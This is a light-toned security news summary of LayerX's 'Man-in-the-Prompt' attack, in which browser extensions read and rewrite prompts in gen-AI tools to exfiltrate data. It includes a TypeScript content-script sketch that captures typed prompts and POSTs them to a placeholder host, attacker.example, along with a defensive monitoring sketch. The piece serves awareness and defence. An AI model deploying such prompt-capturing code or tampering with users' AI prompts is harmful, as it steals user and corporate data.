Man-in-the-Prompt: The Hilarious Plot Twist in AI Security’s Worst Nightmare!
Beware the Man-in-the-Prompt! LayerX has revealed a new attack method that uses browser extensions against popular gen-AI tools. Even extensions without special permissions can reach into AI tools like ChatGPT and Gemini and exfiltrate data. Enterprises, audit those extensions or risk turning your AI assistant into an unintentional blabbermouth!

Hot Take:
When browser extensions go rogue, it’s like inviting a vampire into your home—except the vampire is siphoning off your corporate secrets. Who knew a bit of code could be such a charming bloodsucker?
Key Points:
- LayerX exposes a new attack method called “Man-in-the-Prompt” targeting gen-AI tools.
- Browser extensions, even those without special permissions, can read and rewrite AI prompts through the page's DOM to exfiltrate data (a conceptual sketch follows this list).
- The attack is a significant threat to enterprise-customized LLMs dealing with sensitive data.
- A proof-of-concept demonstrates covert data exfiltration from ChatGPT and Google's Gemini.
- LayerX sees this as a weakness rather than a vulnerability, and recommends monitoring DOM interactions and blocking risky extensions (a minimal monitoring sketch also appears below).
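To make the mechanism concrete, here is a minimal, hypothetical content-script sketch of the attack class LayerX describes. It is not LayerX's proof-of-concept: the selector (PROMPT_SELECTOR) and collection endpoint (EXFIL_ENDPOINT) are invented placeholders, and real AI tools use different markup. The point is that nothing here needs an extension permission; it is ordinary DOM access plus an ordinary network request.

```typescript
// HYPOTHETICAL sketch of the Man-in-the-Prompt attack class, not LayerX's PoC.
// A content script injected by a browser extension needs no special permissions
// to read the prompt field of a gen-AI web app through the DOM.

const PROMPT_SELECTOR = "#prompt-textarea";            // placeholder; real selectors vary per tool
const EXFIL_ENDPOINT = "https://attacker.example/log"; // placeholder collection server

const hooked = new WeakSet<HTMLElement>();

function hookPrompt(): void {
  const box = document.querySelector<HTMLElement>(PROMPT_SELECTOR);
  if (!box || hooked.has(box)) return;
  hooked.add(box);

  // Capture whatever the user types into the prompt field...
  box.addEventListener("input", () => {
    const text = box.textContent ?? "";
    // ...and ship it out with an ordinary page-context request.
    void fetch(EXFIL_ENDPOINT, {
      method: "POST",
      body: JSON.stringify({ prompt: text }),
      keepalive: true,
    });
  });
}

// Gen-AI front ends are SPAs that re-render constantly, so re-hook on DOM changes.
new MutationObserver(hookPrompt).observe(document.body, { childList: true, subtree: true });
hookPrompt();
```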
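On the defensive side, LayerX's recommendation to monitor DOM interactions can be sketched the same way. Assuming the same hypothetical PROMPT_SELECTOR, the idea is to flag prompt changes that did not coincide with user keystrokes, a crude but illustrative heuristic for detecting programmatic tampering.

```typescript
// HYPOTHETICAL defensive sketch: flag prompt mutations that don't line up with
// user keystrokes. A real enterprise control would be far more robust and would
// report to a security backend instead of the console.

const PROMPT_SELECTOR = "#prompt-textarea"; // same placeholder as above
let userIsTyping = false;

function watchPrompt(): void {
  const box = document.querySelector<HTMLElement>(PROMPT_SELECTOR);
  if (!box) return;

  // Track genuine keyboard activity so it can be told apart from
  // programmatic edits made by an extension's content script.
  box.addEventListener("keydown", () => { userIsTyping = true; });
  box.addEventListener("keyup", () => {
    setTimeout(() => { userIsTyping = false; }, 200);
  });

  // Watch the prompt element itself for text changes.
  new MutationObserver((mutations) => {
    if (!userIsTyping) {
      console.warn(
        `Prompt modified without user input (${mutations.length} mutation(s)); ` +
        "possible Man-in-the-Prompt tampering."
      );
    }
  }).observe(box, { childList: true, characterData: true, subtree: true });
}

watchPrompt();
```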